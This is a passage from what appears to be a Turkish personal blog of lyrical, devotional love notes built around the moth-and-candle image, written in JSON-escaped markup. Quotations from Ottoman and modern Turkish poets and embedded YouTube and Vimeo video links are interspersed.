+\n-\u0130\u00e7im ile durmadan s\u00f6yle\u015firken nas\u0131l susay\u0131m? +\n-_Haberdar oldu\u011funa delilin var m\u0131d\u0131r?_ +\n-Bir ay, ayd\u0131nl\u0131\u011f\u0131n\u0131n d\u00fc\u015ft\u00fc\u011f\u00fc g\u00f6n\u00fclden big\u00e2ne midir? +\n-_Ne vakte kadar inilersin?_ +\n-Vaktin varl\u0131\u011f\u0131ndan s\u0131yr\u0131lmadan tamam olunur mu? +\n-_Neyi beklersin?_ +\n-Pervane, \u015fem tutu\u015fmadan ne yaps\u0131n? Bekledi\u011fim \u015feminden bir \u0131\u015f\u0131kt\u0131r.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::asqjpUOo3YE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUyutmayan sebep, sen ne g\u00fczelsin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYa Karacao\u011flan halim ortadad\u0131r, h\u00e2l\u00e2 uyand\u0131rmaz m\u0131? +\n_\"Perv\u00e2ne \u015fem\u2019ini uyand\u0131ramaz_ +\n_Ba\u015fta sevd\u00e2 kalpte n\u00e2r olmay\u0131nca\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcmit ve sab\u0131r, iki karde\u015f. Birbirlerine ne g\u00fczel sar\u0131l\u0131yor \u015fimdi. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6yle sermestim ki ne i\u015f ne yolculuk ne okul ne de s\u0131navdan bir yorgunluk hissediyorum. Nas\u0131l sermest olmayay\u0131m ki muhatap alm\u0131\u015fken bu bendeyi? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcfleyiverdi y\u00e2reme \u015fifa deyu ol mehlik\u00e2 +\nAmma c\u00fb\u015fa getirdi i\u00e7re ate\u015fi bilmedi\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAcemice, belki hadsizce. Dilime dolanmadan kelimeler s\u00f6ylemek kolay de\u011fil. +\nG\u00fcn do\u011fmas\u0131n pencereme ne olur, gecemi ayd\u0131nlatan ay yeter. +\n_Bir nefeslik lafz\u0131mda zikrime c\u00e2nan d\u00fc\u015fer_\n\nvideo::244526490[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervaneyi bir vesvese tutmu\u015f, ka\u00e7 gecedir uyumaz beni de uyutmaz. \"S\u00f6ylediklerimle \u015femi \u00fczer miyim?\", diye kara kara d\u00fc\u015f\u00fcn\u00fcr. \"Acaba \u015fem pervanenin varl\u0131\u011f\u0131ndan ho\u015fnut mudur?\" Teselli verdim, ikna etmeye kalk\u0131\u015ft\u0131m. K\u00e2r etmedi. Ne diyeyim, nas\u0131l edeyim? +\n*Pervane kendi acizli\u011fine hatalar\u0131na bak\u0131p vesveseye d\u00fc\u015ferdi. \u015eem \u00fcz\u00fclmesin; pervane tevekk\u00fcl ipine sar\u0131ld\u0131, \u00f6ylece uyudu.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervanenin benden ba\u015fka s\u0131rda\u015f\u0131 yok, kime anlats\u0131n halini? Kime d\u00f6ks\u00fcn i\u00e7ini? Ak\u0131tacak g\u00f6z\u00fcnden ya\u015flar\u0131 ama onlar\u0131n s\u0131rr\u0131n\u0131 if\u015fa edece\u011finden \u00e7ekinir. G\u00f6zya\u015flar\u0131n\u0131 da i\u00e7inde saklar.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eem'i \u00fczerlermi\u015f, yorgun b\u0131rak\u0131rlarm\u0131\u015f galiba. Be vefas\u0131z Pervane sen de durmaz kendi derdinden s\u00f6ylersin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eeyh Galib'in duas\u0131na \"Amin!\" deriz. \n\n_\"Y\u00e2resi muht\u00e2c-\u0131 k\u00e2f\u00fbr olmas\u0131n bir kimsenin_ +\n_S\u00eeneden mehp\u00e2resi d\u00fbr olmas\u0131n bir kimsenin\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::nQh3bOwTnMg[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEn \u00e7ok yolculuklar d\u00fc\u015f\u00fcnd\u00fcr\u00fcr insana, akl\u0131na gelmeyenler yakalar karanl\u0131\u011f\u0131n ve \u0131ss\u0131zl\u0131\u011f\u0131n ortas\u0131nda.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDilimde dua: \n\"Hata etmekten koru, us\u00fbls\u00fcz vusulden sana s\u0131\u011f\u0131nd\u0131k. Cahile yol g\u00f6ster.\" \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYazmal\u0131 m\u0131y\u0131m s\u00e2hiden? Sanki yazamad\u0131klar\u0131m\u0131 da g\u00f6nl\u00fcmden okursun. Oku ki kalks\u0131n sanc\u0131s\u0131 \u00fczerimden.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUtana s\u0131k\u0131la, incitmekten korkarak...\n\nvideo::245933662[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_K\u0131r\u0131yorlar kalbini, yoruyorlar g\u00f6nl\u00fcn\u00fc nas\u0131l \u015fifa buluyorsun?_ +\n-Bir emanet gibi saklad\u0131\u011f\u0131m c\u00fcmlelerini okuyup okuyup deva buluyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::QKnuIhKRWu0[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Y\u00fcz \u00e7evirmem olsa d\u00fcnya bir yana ben bir yana_ +\n_\u015eem\u2019ine perv\u00e2neyim perv\u00e2 ne l\u00e2z\u0131md\u0131r bana_ +\n_Anlas\u0131n b\u00eeg\u00e2ne bilsin \u00e2\u015fin\u00e2 sevdim seni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nMadem and\u0131k, bug\u00fcn de K\u00e2ni s\u00f6ylesin: \n\n_\"M\u00e2hum seni ben pen\u00e7e-i h\u00fbr\u015f\u00eede degi\u015fmem_ +\n_Ol s\u00eene-i s\u00e2f\u00ee dem-i isp\u00eede degi\u015fmem\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHadsizli\u011fin zirvesinde yan\u0131mda utanc\u0131m... Bir y\u0131l evvelin sesidir yank\u0131lanan ve \u00e7irkindir, bilirim. G\u00fczel k\u0131lan yeg\u00e2ne \u015feydir i\u015fitecek olan kulaklar. \n\n\"_Sevgili Dost,_ +\n_Schumann: \"\u00e7alarken, seni kimin dinledi\u011fini umursama\" diyor. Bense umursuyorum, kimin dinledi\u011fini.\"_ +\n\nhttps:\/\/vimeo.com\/246656385\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDar\u0131lma, i\u015fte b\u00f6yle... +\n_\"Durup dinlenmeden akarsa p\u0131nar,_ +\n_Her y\u0131l k\u0131\u015ftan sonra gelirse bahar,_ +\n_Bal\u0131klar\u0131n suyu sevdi\u011fi kadar,_ +\n_Ben de seni seviyorum, dar\u0131lma.\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::rxamCTtodME[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBirka\u00e7 zorlu\u011fun i\u00e7inde kula\u00e7 atarken durdum, fark\u0131na vard\u0131m. \n\n_\"Sevgili Dost,_ +\n_Sen laz\u0131ms\u0131n bana! Ve \u00f6nemlisin hadiselerden.\"_\n\n_\"Sevgili Dost,_ +\n_Bug\u00fcn yazmak de\u011fil, konu\u015fmak istiyordum seninle. Ama yine yazd\u0131m.\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::247592380[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::FfgLSNglfsY[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nMihrimah'da bulsa v\u00fccut.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNah\u00eef\u00ee sormu\u015f: +\n_\"G\u00f6z g\u00f6rd\u00fc g\u00f6n\u00fcl sevdi seni ey y\u00fcz\u00fc m\u00e2h\u0131m_ +\n_Kurb\u00e2n\u0131n olam var m\u0131 benim bunda g\u00fcn\u00e2h\u0131m\"_\u00a0\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Mevlam kulu sevdim seni_ \n\nvideo::MUZBPnjgzhw[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAhmet Muhip Dranas'tan :\n\n_\"Bir g\u00fczelim sensin, bir de g\u00f6ky\u00fcz\u00fc,_ +\n_Gerisi denizler \u00f6tesi, hepsi._ +\n_G\u00f6ky\u00fcz\u00fcy\u00fcm g\u00fcnd\u00fcz\u00fcyle, gecesiyle,_ +\n_Sen g\u00fczelim a\u015fk\u0131yla, ne\u015fesiyle_ +\n_Uyumlu, esgin, el ele, ikiniz,_ +\n_Umutlarla bezer, g\u00f6nendirirsiniz_ +\n_\u00d6mr\u00fcm\u00fc, k\u0131y\u0131s\u0131nda bir ak\u015fam\u0131n.\"_ \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNe desin bu fakir, d\u00fc\u011f\u00fcm d\u00fc\u011f\u00fcm olmu\u015fsa dili? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::-mZqs6VEwRk[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"kalbimin h\u00fcsn\u00fcyusuf mahrem bah\u00e7elerinde derindesin, r\u00fcya kadar derinde\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nKendine k\u0131zan insan\u0131 ne geri \u00e7evirir bundan? Yap\u0131lan hatan\u0131n telafisi \u00f6z\u00fcr de\u011fil, biliyor hata yapan. Peki telafisi var m\u0131d\u0131r, bilmiyor.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYa\u011fmurda y\u00fcr\u00fcyene, +\n_\"G\u00fcl\u00fc\u015f\u00fcne ya\u011fmur damlas\u0131 \u00e7arpsa,_ +\n_\u015eiir olur._ +\n_Bunu bir ben bilirim,_ +\n_Bir de g\u00f6ky\u00fcz\u00fc.\"_ \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Kanat tak\u0131p u\u00e7urur da bu d\u00fc\u015fler_ +\n_Uyand\u0131r\u0131r en tatl\u0131 yerinde_ +\n_G\u00fcn ortas\u0131nda sabah seherinde_ +\n_Hat\u0131rlan\u0131r yeniden_\n\nvideo::2H1oTjQ7fsI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::yKMDy_AigLQ[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::kOxKvZJrUpA[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Z\u00fclf-i siyah\u0131 s\u00e2ye-i perr-i H\u00fcm\u00e2 imi\u015f_ +\n_\u0130kl\u00eem-i h\u00fcsne anun i\u00e7\u00fcn p\u00e2di\u015f\u00e2 imi\u015f\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::PNTW_77bOho[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::kU4ppB06qMc[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_G\u00fcn geldiyse..._\n\nvideo::e-Y0IEoczj8[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Sana gelirim_\n\nvideo::251945761[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBundand\u0131r g\u00fczel ad\u0131n\u0131z oldu nihan. \n\nhttps:\/\/twitter.com\/iskenderpalanet\/status\/767788983829102592\n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nOlmaz bilirim. Hem kendime hem m\u00e2h\u0131ma bir hat\u0131rlatma sadece: +\n_\"H\u00e2t\u0131r\u0131ndan \u00e7\u0131kmas\u0131n lutfet hem\u00e2n mehc\u00fbr olan_ +\n_Olmas\u0131n b\u00e2r\u00ee g\u00f6n\u00fclden d\u00fbr g\u00f6zden d\u00fbr olan\"_ +\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHamd et ey hakir g\u00f6nl\u00fcm \u00f6mr\u00fcnce, kafi gelmese de... Nas\u0131l s\u0131\u011fd\u0131rd\u0131n bir m\u00e2h\u0131 g\u00f6nl\u00fcne, nas\u0131l girdin bir m\u00e2h\u0131n g\u00f6nl\u00fcne? Hamd olsun... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\"Gel\" dese gitmez misin? +\nKo\u015fa ko\u015fa gidilir izin \u00e7\u0131ksa. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEsir-i z\u00fclf\u00fcn\u00fcm... \n\nvideo::R_aC7EFFACM[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSan\u0131rlar ki k\u0131zg\u0131n ve k\u0131rg\u0131n\u0131m. Asla! Bir de b\u00f6yle s\u00f6yleyelim ki ikna olunsun.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::ci2pe08q61M[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nB\u00e2k\u00ee'den \u00e7al\u0131p s\u00f6ylesem \u00e7ok mudur? +\n\n_\"Hep senin\u00e7\u00fcnd\u00fcr benim d\u00fcnya cef\u00e2s\u0131n \u00e7ekti\u011fim_ +\n_Yoksa \u00f6mr\u00fcm var\u0131 sensiz neylerim d\u00fcny\u00e2y\u0131 ben\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nKar nas\u0131l yakar insan\u0131n i\u00e7ini? Hat\u0131ra geldik\u00e7e bir sevin\u00e7 bir 